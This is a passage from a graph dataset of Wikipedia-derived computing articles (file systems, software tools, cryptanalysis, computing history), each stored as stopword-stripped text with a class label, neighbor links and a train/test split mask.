    "node_id": 2562,
    "label": 0,
    "text": "L2_Syntactic_Complexity_Analyzer:l2 syntactic complexity analyzer l2 syntactical complexity analyzer l2sca developed xiaofei lu pennsylvania state university computational tool produces syntactic complexity indices written english language texts along coh-metrix l2sca one extensively used computational tool compute indices second language writing development l2sca also widely utilised field corpus linguistics l2sca available single batch mode first provides possibility analyzing single written text 14 syntactic complexity indices latter allows user analyze 30 written texts simultaneously l2sca used numerous studies field second language writing development compute indices syntactic complexity l2sca also used various studies field corpus linguistics",
    "neighbors": [
      1890,
      8565
    ],
    "mask": "None"
  },
  {
    "node_id": 2563,
    "label": 4,
    "text": "Kerio_Technologies:kerio technologies kerio technologies inc. former technology company specializing collaboration software unified threat management small medium organizations founded 2001 kerio headquartered san jose california january 2017 gfi software acquired kerio kerio technologies incorporated 2001 first product winroute pro entered internet security market 1997 owned maintained tiny software february 1 2002 tiny software transferred sales development software kerio developers continued work kerio brand kerio main products early 2000s kerio personal firewall kerio winroute firewall company focused collaboration software kerio mailserver kerio discontinued personal firewall late 2005 acquired sunbelt software starting 2010 kerio mailserver renamed kerio connect kerio winroute kerio control kerio introduced kerio operator ip pbx system 2011 samepage file sharing collaboration software 2013 january 2017 kerio bought gfi software kerio connect kerio control kerio operator kerio cloud became gfi assets samepage part acquisition",
    "neighbors": [
      1792,
      2049,
      4480,
      6797,
      1172,
      3350,
      9496,
      3482,
      1436,
      670,
      4511,
      6431,
      5924,
      550,
      8998,
      10790,
      939,
      1708,
      3885,
      8753,
      823,
      569,
      5178,
      11577,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      6993,
      7121,
      10708,
      4568,
      9048,
      2907,
      6364,
      5860,
      3942,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2564,
    "label": 6,
    "text": "OneFS_distributed_file_system:onefs distributed file system onefs file system parallel distributed networked file system designed isilon systems basis isilon scale-out storage platform onefs file system controlled managed onefs operating system freebsd variant data structures onefs file system maintain protection information means filesystem one file may protected +1 basic parity protection another may protected +4 resilient four failures yet another file may protected 2x mirroring feature referred flexprotect flexprotect also responsible automatically rebuilding data event failure protection levels available based number nodes cluster follow reed solomon algorithm blocks individual file spread across nodes allows entire nodes fail without losing access data file metadata directories snapshot structures quotas structures logical inode mapping structure based mirrored b+ trees block addresses generalized 64-bit pointers reference node drive blknum tuples native block size 8192 bytes inodes 512 bytes disk disks 512 byte sectors 8kb disks 4kb sectors one distinctive characteristic onefs metadata spread throughout nodes homogeneous fashion dedicated metadata servers piece metadata replicated every node address list root btree blocks inode mapping structure everything else found starting point following generalized 64-bit pointers nodes running onefs must connected together high performance low-latency back-end network optimal performance onefs 1.0-3.0 used gigabit ethernet back-end network starting onefs 3.5 isilon offered infiniband models 2007 mid-2018 nodes sold utilized infiniband back-end starting onefs 8.1.0 gen6 models isilon offers ethernet back-end network 10 gigabit 40 gigabit data metadata locking transaction group management allocation event traffic go back-end rpc system data metadata transfers zero-copy modification operations on-disk structures transactional journaled onefs equipped options accessing storage via nfs cifs/smb ftp http hdfs utilize non-local authentication active directory ldap nis capable interfacing external backup devices applications use ndmp protocol onefs file system proprietary file system managed controlled freebsd-derived onefs operating system zsh default login shell onefs operating system onefs presents specialized command set administer onefs file system specialized shell programs start letters isi notable exceptions isilon extensions freebsd codice_1 codice_2 programs",
    "neighbors": [
      5120,
      2051,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      7863,
      5816,
      1212,
      4797,
      8380,
      7364,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      9452,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      929,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      1990,
      7126,
      1509,
      998,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 2565,
    "label": 3,
    "text": "Gemini_Wing:gemini wing gemini wing arcade game created tecmo released 1987 vertically-scrolling shooter one two players control futuristic aircraft travelling numerous terrains shooting enemies animalistic insectoid design home conversions released zx spectrum commodore 64 amstrad cpc amiga atari st msx x68000",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2566,
    "label": 8,
    "text": "PowerMapper:powermapper powermapper web crawler automatically creates site map website using thumbnails web page number map styles available although cheaper standard edition fewer styles professional edition site maps displayed number different map styles arrange sites tree structure styles display thumbnails page others use text-only presentation map styles include site maps also exported xml sitemaps format use google yahoo msn search engines product received positive reviews infoworld 1.0 release 1997 subsequent reviews 4.0 release microsoft technet magazine websitetips.com also favorable list problems commonly encountered users provided vendor powermapper faq powermapper commercial licensed software uses serial numbers prevent unlicensed usage standard licensing per-user pooled floating licences also available extra cost",
    "neighbors": [
      3744,
      8769,
      3875,
      4473,
      714,
      6797,
      2318,
      7983,
      944,
      113,
      11284,
      1240,
      1913,
      2459
    ],
    "mask": "None"
  },
  {
    "node_id": 2567,
    "label": 4,
    "text": "Boomerang_attack:boomerang attack cryptography boomerang attack method cryptanalysis block ciphers based differential cryptanalysis attack published 1999 david wagner used break coconut98 cipher boomerang attack allowed new avenues attack many ciphers previously deemed safe differential cryptanalysis refinements boomerang attack published amplified boomerang attack rectangle attack boomerang attack based differential cryptanalysis differential cryptanalysis attacker exploits differences input cipher plaintext affect resultant difference output ciphertext high-probability differential input difference produce likely output difference needed covers nearly cipher boomerang attack allows differentials used cover part cipher attack attempts generate so-called quartet structure point halfway cipher purpose say encryption action e cipher split two consecutive stages e e e e e plaintext message suppose two differentials two stages say e basic attack proceeds follows one attack kasumi block cipher used 3gpp related-key rectangle attack breaks full eight rounds cipher faster exhaustive search biham et al. 2005 attack requires 2 chosen plaintexts encrypted one four related keys time complexity equivalent 2 kasumi encryptions",
    "neighbors": [
      7556,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      1114,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 2568,
    "label": 6,
    "text": "Robocopy:robocopy robocopy robust file copy command-line directory and/or file replication command microsoft windows robocopy functionally replaces xcopy options available part windows resource kit starting windows nt 4.0 first introduced standard feature windows vista windows server 2008 command robocopy robocopy noted capabilities beyond built-in windows copy xcopy commands including following requiring appropriate command-line options examples usage one option specified must separated spaces directory names non-standard characters spaces put double quotes usual command-line commands full reference see microsoft technet robocopy page robocopy syntax markedly different predecessors copy xcopy accepts folder names without trailing backslash source destination arguments file names wildcard characters codice_23 codice_24 valid source destination arguments files selected excluded using optional file filtering argument supports wildcards along various options example copy two files folder codice_25 codice_26 following syntax used copy pdf files codice_25 codice_26 files named copied folder selected copying fully qualified path names supported robocopy outputs screen optionally log file directories encounters alphabetical order directory preceded number files directory fulfill criteria copied directory yet exist target marked new dir directory empty /e option used contains files meeting criteria new directory created /nfl file names log option used files copied listed name directory end output table giving numbers directories files bytes table gives total number found source number copied includes directories marked new dir even copied number skipped already exist target number mismatches failed extras failed mean i/o error prevented file copied access denied also row time taken time spent failed files seems wrong column robocopy inter-packet gap ipg option allows control network bandwidth used session theory following formula expresses delay milliseconds required simulate desired bandwidth b kilobits per second network link available bandwidth b kbps formula_1 practice however experimentation usually required find suitable delay due factors nature volume traffic network methodology employed ipg option may offer level control provided bandwidth throttling technologies bits used windows update branchcache although robocopy command-line tool microsoft technet provides gui front-end called robocopy gui developed derk benisch systems engineer msn search group microsoft required .net framework 2.0 includes copy robocopy version xp026 non-microsoft guis robocopy ken tamaru microsoft developed copying program similar robocopy called richcopy available microsoft technet based robocopy offers similar features require .net framework note several versions robocopy show version number executing codice_35 command line version stored inside executable queried powershell example codice_36 inside windows explorer right-clicking robocopy.exe selecting properties clicking details tab",
    "neighbors": [
      3970,
      8834,
      10631,
      6281,
      6797,
      3856,
      2193,
      6674,
      8976,
      4248,
      8729,
      8988,
      4001,
      9505,
      4771,
      10489,
      7847,
      808,
      7983,
      7088,
      10033,
      3250,
      9780,
      9910,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      8517,
      1741,
      4174,
      1750,
      9946,
      2406,
      10727,
      5482,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      8692,
      3573,
      10101,
      11249,
      6265,
      6396
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2569,
    "label": 4,
    "text": "Packet_generator:packet generator packet generator packet builder type software generates random packets allows user construct detailed custom packets depending network medium operating system packet generators utilize raw sockets ndis function calls direct access network adapter kernel-mode driver useful testing implementations ip stacks bugs security vulnerabilities",
    "neighbors": [
      9440,
      418,
      5636,
      4011,
      1580,
      10349,
      2007,
      5657,
      11486,
      11006,
      10079
    ],
    "mask": "Test"
  },
  {
    "node_id": 2570,
    "label": 1,
    "text": "WxSQLite3:wxsqlite3 wxsqlite3 c++ wrapper around public domain sqlite 3.x database specifically designed use programs based wxwidgets library wxsqlite3 try hide underlying database contrary almost special features current sqlite version 3.18.0 supported like example creation user defined scalar aggregate functions since sqlite stores strings utf-8 encoding wxsqlite3 methods provide automatic conversion wxstrings utf-8 strings works best unicode builds wxwidgets ansi builds current locale conversion object wxconvcurrent used conversion to/from utf-8 special care taken external administration tools used modify database contents since tools operate unicode resp utf-8 mode since version 1.7.0 optional support key based database encryption 128 bit aes also included starting version 1.9.6 wxsqlite3 encryption extension compatible sqlite amalgamation source includes extension functions module support 256 bit aes encryption added version 1.9.8 since version 3.5.0 sqlite library integrated part wxsqlite3 since version 4.0.0 wxsqlite3 supports select encryption scheme runtime addition wxsqlite3 legacy schemes aes 128 bit aes 256 bit two encryption schemes namely sqleet aka chacha20 poly1305 sqlcipher aka aes 256 bit sha1/sha256/sha512 sqlcipher variants version 1 version 4 supported selected",
    "neighbors": [
      5546,
      5612,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2571,
    "label": 2,
    "text": "Spinning_pinwheel:spinning pinwheel spinning pinwheel variation mouse pointer arrow used apple macos indicate application busy officially macos human interface guidelines refers spinning wait cursor also known names including spinning beach ball spinning wheel death loading spinny spinning pizza death spod wristwatch first wait cursor early versions classic mac os apple hypercard first popularized animated cursors including black-and-white spinning quartered circle resembling beach ball beach-ball cursor also adopted indicate running script code hypertalk-like applescript cursors could advanced repeated hypertalk invocations set cursor busy wait cursors activated applications performing lengthy operations versions apple installer used animated counting hand cursor applications provided theme-appropriate custom cursors revolving yin yang symbol fetch running dog retrospect spinning tape pro tools tapping fingers apple provided standard interfaces animating cursors originally cursor utilities spincursor rotatecursor mac os 8 later appearance manager setanimatedthemecursor nextstep 1.0 used monochrome icon resembling spinning magneto-optical disk whose drive quite slow common reason wait cursor appear color support added nextstep 2.0 color versions icons added wait cursor updated reflect bright rainbow surface removable disks icon remained even later machines began using hard disk drives primary storage contemporary cd rom drives even slower 1x 150 kb/s arrival mac os x wait cursor often called spinning beach ball press presumably authors knowing next history relating hypercard wait cursor two-dimensional appearance kept essentially unchanged next rhapsody/mac os x server 1.0 otherwise user interface design resembling mac os 8/platinum theme mac os x 10.0/cheetah mac os x 10.1/puma introduced aqua user interface theme mac os x 10.2/jaguar gave cursor glossy rounded gumdrop look keeping os x interface elements os x 10.10 entire pinwheel rotates previously overlaying translucent layer moved os x 10.11 el capitan spinning wait-cursor design updated less shadowing brighter solid colors better match design user interface colors also turn spinning texture single-tasking operating systems like original macintosh operating system wait cursor might indicate computer completely unresponsive user input indicate response may temporarily slower usual due disk access changed multitasking operating systems system software 5 usually possible switch another application continue work individual applications could also choose display wait cursor long operations often able cancelled keyboard command transition mac os x macos apple narrowed wait cursor meaning display wait cursor controlled operating system application could indicate application infinite loop performing lengthy operation ignoring events application event queue receives events operating system example key presses mouse button clicks application takes longer 2 seconds process events event queue regardless cause operating system displays wait cursor whenever cursor hovers application windows meant indicate application temporarily unresponsive state application recover also may indicate part application entered unrecoverable state infinite loop time user may prevented closing resizing even minimizing windows affected application although moving window still possible os x well previously hidden parts window usually redrawn even application otherwise unresponsive one application unresponsive typically applications usable file system network delays another common cause default events actions initiate processed sequentially works well event involves trivial amount processing spinning wait cursor appearing operation complete processing takes long application appear unresponsive developers may prevent using separate threads lengthy processing allowing application main thread continue responding external events however greatly increases application complexity another approach divide work smaller packets use nsrunloop grand central dispatch instruments application comes mac os x developer tools along functions allows user monitor sample applications either responding performing lengthy operation time application respond spinning wait cursor activated instruments sample process determine code causing application stop responding information developer rewrite code avoid cursor activated apple guidelines suggest developers try avoid invoking spinning wait cursor suggest user interface indicators asynchronous progress indicator spinning wait cursor commonly referred spinning x death/doom common words phrases x replaced include",
    "neighbors": [
      1542,
      4486,
      5520,
      3474,
      11539,
      8852,
      1694,
      6319,
      11444,
      3766,
      11581,
      9919,
      576,
      5840,
      10333,
      4844,
      5744,
      7795,
      8441
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2572,
    "label": 9,
    "text": "Microsoft_Basic_1.0:microsoft basic 1.0 basic 1.0 standard basic language thomson computers mo5 to7 etc reference entire range implementation microsoft basic basic-69 mo5 instruction set reduced double precision implemented interpreter fits 12 kb rom instead 16 kb to7 upgraded version produced name basic 128 to7-70 to9 mo5nr mo6 included dos new instructions to8/8d to9+ even upgraded version name basic 512 provided basic 1.0 interpreter recognizes usual commands for..next gosub..return if..then..else data read restore statements advanced instructions like on..goto on..gosub also possible used introduce children france programming 1980s three languages mainly taught lse basic logo school textbooks programs given basic 1.0 thomson sometimes exelbasic exelvision exl 100",
    "neighbors": [
      6594
    ],
    "mask": "Test"
  },
  {
    "node_id": 2573,
    "label": 2,
    "text": "Z80-RIO:z80-rio z80-rio abbreviation z80 operating system relocatable modules i/o management general-purpose operating system developed zilog late 1970 various computer systems including z80 micro computer system mcz-1 series z80 development system zds mcz systems primarily used software development automation solutions rio designed facilitate development integration user programs production environment system provides modest environment minimum system support enhanced environment modest environment provides program debugger file manipulation capability floppy disk driver supporting eight disk drives basic console driver provision paper tape operation enhanced environment provides access rio executive system support utilities zilog floppy disk file system zdos zilog hard disk file system dfs also provides access number disk-resident software text editor macro assembler linker following list commands supported z80-rio udos z80-rio compatible clone veb robotron available number computers company 5120 pc 1715 based u880 processor latter clone zilog z80 udos also one operating systems available p8000 microcomputer system developed 1987 veb elektro-apparate-werke berlin-treptow „ friedrich ebert “ eaw german democratic republic ddr east germany",
    "neighbors": [
      2179,
      7847,
      6664,
      4682,
      7983,
      1750,
      6203,
      1501
    ],
    "mask": "Test"
  },
  {
    "node_id": 2574,
    "label": 3,
    "text": "26-bit:26-bit computer architecture 26-bit integers memory addresses data units 26 bits wide thus represent values 64 mega base 2 two examples computer processors featured 26-bit memory addressing certain second generation ibm system/370 mainframe computer models introduced 1981 several subsequent models 26-bit physical addresses 24-bit virtual addresses earlier models first generations arm processors data processing needs continued grow ibm customers faced challenges directly addressing larger memory sizes ended short-term emergency solution pair ibm second wave system/370 models 3033 3081 introduced 26-bit real memory addressing increasing system/370 amount physical memory could attached factor 4 previous 24-bit limit 16 mb ibm referred 26-bit addressing extended real addressing subsequent models also included 26-bit support however 2 years later ibm introduced 31-bit memory addressing expanding physical virtual addresses 31 bits system/370-xa models even popular 3081 upgradeable xa standard given 26-bit brief history state-of-the-art memory addressing available ibm model range given virtual addresses still limited 24 bits software exploitation 26-bit mode limited customers exploited 26-bit mode eventually adjusted applications support 31-bit addressing ibm dropped support 26-bit mode several years producing models supporting 24-bit 26-bit 31-bit modes 26-bit mode addressing mode ibm removed line mainframe computers descended system/360 addressing modes including 64-bit mode supported current model mainframes arm processor architecture 26-bit refers design used original arm processors program counter pc processor status register psr combined one 32-bit register r15 status flags filling high 6 bits program counter taking lower 26 bits fact program counter always word-aligned lowest two bits always zero allowed designers reuse two bits hold processor mode bits four modes allowed usr26 svc26 irq26 fiq26 contrast 32 possible modes available program status separated program counter recent arm architectures design enabled efficient program execution program counter status flags could saved restored single operation resulted faster subroutine calls interrupt response traditional designs would two register loads saves calling returning subroutine despite 32-bit alu word-length processors based arm architecture version 1 2 26-bit pc address bus consequently limited 64 mib addressable memory still vast amount memory time limitation architectures since included various steps away original 26-bit design arm architecture version 3 introduced 32-bit pc separate psr well 32-bit address bus allowing 4 gib memory addressed change pc/psr layout caused incompatibility code written previous architectures processor also included 26-bit compatibility mode used old pc/psr combination processor could still address 4 gb mode could execute anything address 0x3fffffc 64 mb mode used risc os running acorn risc pc utilise new processors retaining compatibility existing software arm architecture version 4 made support 26-bit addressing modes optional arm architecture version 5 onwards removed entirely",
    "neighbors": [
      9932,
      9964,
      3630,
      7631,
      5457,
      9978
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2575,
    "label": 0,
    "text": "Normalized_Google_distance:normalized google distance normalized google distance ngd semantic similarity measure derived number hits returned google search engine given set keywords keywords similar meanings natural language sense tend close units normalized google distance words dissimilar meanings tend farther apart specifically normalized google distance ngd two search terms x n total number web pages searched google multiplied average number singleton search terms occurring pages f x f number hits search terms x respectively f x number web pages x occur formula_2 x viewed alike possible formula_3 x different two search terms x never occur together web page occur separately ngd infinite terms always occur together ngd zero example 9 april 2013 googling shakespeare gave 130,000,000 hits googling macbeth gave 26,000,000 hits googling shakespeare macbeth gave 20,800,000 hits number pages indexed google estimated number hits search term 25,270,000,000 hits assuming 1,000 search terms average page gives formula_4 hence shakespeare macbeth much alike according relative semantics supplied google normalized google distance derived earlier normalized compression distance namely objects given literally like literal four-letter genome mouse literal text macbeth shakespeare similarity objects given ncd simplicity take meaning object represented literal object objects also given name like 'the four-letter genome mouse 'the text macbeth shakespeare also objects given literally name acquire meaning contexts background common knowledge humankind like 'home red similarity names objects given ngd probabilities google search terms conceived frequencies page counts returned google divided number pages indexed google multplied average number search terms pages approximate actual relative frequencies search terms actually used society based premise relations represented normalized google distance approximately capture assumed true semantic relations governing search terms ngd world wide web google used text corpora wikipedia king james version bible oxford english dictionary together appropriate search engines following properties proved applications colors versus numbers primes versus non-primes given well randomized massive experiment using wordnet categories primes versus non-primes case wordnet experiment ngd method augmented support vector machine classifier experiments consist 25 positive examples 25 negative ones wordnet experiment consisted 100 random wordnet categories ngd method success rate 87.25 mean 0.8725 standard deviation 0.1169 rates agreement wordnet categories represent knowledge researchers phd entered rare see agreement less 75",
    "neighbors": [
      416,
      11206,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 2576,
    "label": 8,
    "text": "Hamlets_(software):hamlets software hamlets previously known ibm servlet-based content creation framework name open source system generating web-pages originally developed rené pawlitzek ibm defines hamlet servlet extension reads xhtml template files containing presentation using sax simple api xml dynamically adds content fly places template marked special tags ids using small set callback functions template compiler used accelerate hamlets hamlets provide easy-to-use easy-to-understand lightweight small-footprint servlet-based content creation framework facilitates development web-based applications hamlets framework supports also enforces complete separation content presentation",
    "neighbors": [
      1920,
      3462,
      8582,
      2062,
      9614,
      148,
      1812,
      9245,
      10526,
      8739,
      3876,
      4777,
      5165,
      5677,
      7983,
      4529,
      7987,
      692,
      8883,
      5048,
      6074,
      9666,
      8644,
      11259,
      1353,
      595,
      4056,
      6493,
      102,
      8554,
      5612,
      8691,
      3705,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2577,
    "label": 9,
    "text": "Louis_Hodes:louis hodes louis hodes june 19 1934 – june 30 2008 american mathematician computer scientist cancer researcher got phd hartley rogers thesis computability john mccarthy late 1950s early 1960s helped produce earliest implementations lisp marvin minsky early research visual pattern recognition lisp also credited idea initial implementation logic programming 1966 moved cancer-related research specifically national institutes health later national cancer institute turned interest visual pattern recognition medical imaging applications also worked efficient algorithms screening chemical compounds studying chemical carcinogenesis work models clustering chemical compounds pronounced milestone developmental therapeutics program national cancer institute revolutioniz ing selection compounds interest measuring novelty chemical structure comparing known compounds",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      7048,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      3119,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      3408,
      11218,
      9299,
      10712,
      3034,
      3675,
      11226,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 2578,
    "label": 0,
    "text": "Computational_Linguistics_(journal):computational linguistics journal computational linguistics quarterly peer-reviewed open-access academic journal field computational linguistics published mit press association computational linguistics acl journal includes articles squibs book reviews established american journal computational linguistics 1974 david hays originally published microfiche 1978 george heidorn transformed print journal 1980 quarterly publication 1984 journal obtained current title open-access since 2009 according journal citation reports journal 2017 impact factor 1.319 following persons editors-in-chief",
    "neighbors": [
      5248,
      1890,
      4038,
      3947,
      7724,
      10577
    ],
    "mask": "None"
  },
  {
    "node_id": 2579,
    "label": 5,
    "text": "Arora_(web_browser):arora web browser arora discontinued free open-source web browser developed benjamin c. meyer arora available linux mac os x windows freebsd os/2 haiku genode operating system supported qt toolkit arora name palindrome browser features include tabbed browsing bookmarks browsing history smart location bar opensearch session management privacy mode download manager webinspector adblock several months meyer discontinued development arora due uncertainty strictures non-compete clauses employer finally july 2011 announced would longer contribute project another software developer bastien pederencino forked arora source code published variant called zbrowser renamed zeromus browser february 2013 may 2013 pederencino published another variant called bluelightcat february 2014 new patches released arora github project page linux distributions incorporating changes individual versions arora packages repositories",
    "neighbors": [
      513,
      6657,
      9736,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      8557,
      3956,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      9151,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 2580,
    "label": 4,
    "text": "Books_on_cryptography:books cryptography books cryptography published sporadically highly variable quality long time despite tempting though superficial paradox secrecy essence sending confidential messages — see kerckhoffs principle contrast revolutions cryptography secure communications since 1970s well covered available literature early example book cryptography roman work lost known references many early cryptographic works esoteric mystical and/or reputation-promoting cryptography mysterious much opportunity things least one work trithemius banned catholic church put index librorum prohibitorum black magic witchcraft many writers claimed invented unbreakable ciphers none though sometimes took long establish 19th century general standard improved somewhat e.g. works auguste kerckhoffs friedrich kasiski étienne bazeries colonel parker hitt william friedman early 20th century also wrote books cryptography authors others mostly abandoned mystical magical tone invention radio much military communications went wireless allowing possibility enemy interception much readily tapping landline increased need protect communications end world war cryptography literature began officially limited one exception american black chamber herbert yardley gave insight american cryptologic success stories including zimmermann telegram breaking japanese codes washington naval conference significant books cryptography include end world war ii early 1980s aspects modern cryptography regarded special concern governments military protected custom cases statute significant work published cryptography period undoubtedly david kahn codebreakers published time mid-1960s virtually information modern practice cryptography available kahn said ninety percent content previously unpublished book caused serious concern nsa despite lack coverage specific modern cryptographic practice much failing prevent book published nsa staff informed even acknowledge existence book asked us military mere possession copy cryptographic personnel grounds considerable suspicion perhaps single greatest importance book impact next generation cryptographers whitfield diffie made comments interviews effect",
    "neighbors": [
      7073,
      8674,
      1315,
      6755,
      4007,
      6599,
      4719,
      6928,
      7887,
      1970,
      4435,
      9617,
      1941,
      7542,
      11514,
      10332,
      3774
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2581,
    "label": 2,
    "text": "Jim_Gettys:jim gettys jim gettys born 15 october 1953 american computer programmer involved multiple computer related projects gettys worked dec cambridge research laboratory january 2009 vice president software one laptop per child project working software olpc xo-1 2009 2014 worked alcatel-lucent bell labs since 2010 gettys core member group investigating bufferbloat effect performance internet one original developers x window system mit worked x.org served board directors served gnome foundation board directors worked world wide web consortium w3c editor http/1.1 specification internet engineering task force draft standard gettys helped establish handhelds.org community development linux handheld devices traced one main goals olpc review overhaul much standard linux software order make run faster consume less memory power context pointed common fallacy among programmers today storing computed values memory preferable recomputing values later claims often false current hardware given fast cpus long time takes recover potential cache miss holds bsc degree mit earth planetary sciences course 12 — eaps 1997 internet plumber year award behalf group worked http/1.1 gettys one keepers flame usenix 1999 lifetime achievement award behalf x window system community large",
    "neighbors": [
      1026,
      9223,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      10004,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      3618,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      429,
      3764,
      1717,
      823,
      2109,
      11069,
      10687,
      7872,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      6993,
      8787,
      11602,
      4437,
      6489,
      3802,
      4831,
      8671,
      9696,
      11232,
      8682,
      5867,
      1644,
      7793,
      1394,
      1396,
      3189,
      11643,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 2582,
    "label": 0,
    "text": "ULTRA_(machine_translation_system):ultra machine translation system ultra machine translation system created five languages japanese chinese spanish english german computing research laboratory 1991 ultra universal language translator machine translation system developed computing research laboratory translate five languages japanese chinese spanish english german uses artificial intelligence well linguistic logic programming methods main goal system robust cover general language simple use uses bidirectional parsers/generators system language-independent system intermediate representation means takes account needs expression expression one main elements language uses relaxation techniques provide best translation used x window user interface users paste sentence source window chose target language press translate tool translates source text taking consideration said said said lexical entries system two parts ultra works intermediate representation language systems transfer takes place language systems independent independent systems gives extra benefit adding another language disrupt existing language translations developers david farwell yorick wilks created ir interlingual representation base analyzing generating expressions analyzed many different types communications business letters documents emails compare communication style ultra looks best words kinds information good forms equivalents expression target language",
    "neighbors": [
      5635,
      10703,
      8688,
      5399,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2583,
    "label": 9,
    "text": "SdlBasic:sdlbasic sdlbasic multiplatform interpreter basic using sdl libraries interpreter core based wxbasic interpreter useful people familiar ansi-basic interpreters curious needing sdl library features coding development using ide possible create executable sdlbasic development started december 2002 author vroby roberto viola got idea using sdl libraries wxbasic core instead wxwidgets libraries major releases 2004 2005 2007 2012 prior 2005 text editor used write program code 2005 ide added 2012 package split ide interpreter although ide could used run code main download site sourceforge support site online documentation forum moved changed maintainer found link added altervista.org original author still contributes forum may 22 2008 sdlbasic ported sony playstation portable allows play games use applications coded sdlbasic recently someone qj forums released update version 0.7 included video output slim sdlbasic open source freely available terms gnu general public licence",
    "neighbors": [
      10480,
      303
    ],
    "mask": "None"
  },
  {
    "node_id": 2584,
    "label": 2,
    "text": "UNIX_System_Laboratories,_Inc._v._Berkeley_Software_Design,_Inc.:unix system laboratories inc. v. berkeley software design inc. usl v. bsdi lawsuit brought united states 1992 unix system laboratories berkeley software design inc regents university california intellectual property related unix operating system culmination unix wars case settled court 1994 judge expressed doubt validity usl intellectual property novell time bought usl university agreeing litigate berkeley software distribution bsd suit roots computer systems research group csrg university california berkeley license source code unix bell labs students operating systems research csrg modified extended unix csrg made several releases modified operating system beginning 1978 blessing berkeley software distribution bsd contained copyrighted unix source code available organizations source code license unix students faculty csrg audited software code tcp/ip stack removing intellectual property released general public 1988 net/1 bsd license became apparent berkeley csrg would soon close students faculty csrg began effort remove remaining code bsd replace effort resulted public release net/2 1991 bsd license net/2 contained enough code nearly complete unix-like system csrg believed contained intellectual property berkeley software design bsdi obtained source net/2 filled missing pieces ported intel i386 computer architecture bsdi sold resulting bsd/386 operating system could ordered 1-800-its-unix drew ire agree bsdi claim bsd/386 free intellectual property unix system laboratories subsidiary filed suit bsdi new jersey april 1992 suit later amended include regents university california lawsuit usl alleged grounds usl asked court preliminary injunction would bar bsdi distributing net/2 software case decided hearing bsdi contended using sources freely distributed university california plus six additional files bsdi accepted liability six files refused account files distributed university california judge agreed bsdi argument told usl restate complaint based solely six files would dismiss rather narrow claim usl chose sue bsdi university california requested preliminary injunction distribution net/2 1993 judge dickinson r. debevoise denied preliminary injunction grounds usl valid copyright 32v could show obvious trade secret works published u.s. january 1 1978 march 1 1989 subject provisions 17 u.s.c § 405 required copyright owner properly affix copyright notice work order claim copyright protection released v32 1978 omitted notice thousands copies failed copyright 32v 1992 1993 days dismissal preliminary injunction university filed countersuit usl california claiming usl failed credit university use bsd code system v required software license contract university demanded usl forced reprint documentation appropriate due credit added notify licensees oversight run full-page advertisements major publications wall street journal fortune magazine informing public omission 1993 soon uc filed countersuit usl purchased novell novell ceo ray noorda favored settlement reached 1994 salient points 18,000 files berkeley distribution three removed 70 modified show usl copyright notices condition settlement usl would file lawsuits users distributors upcoming 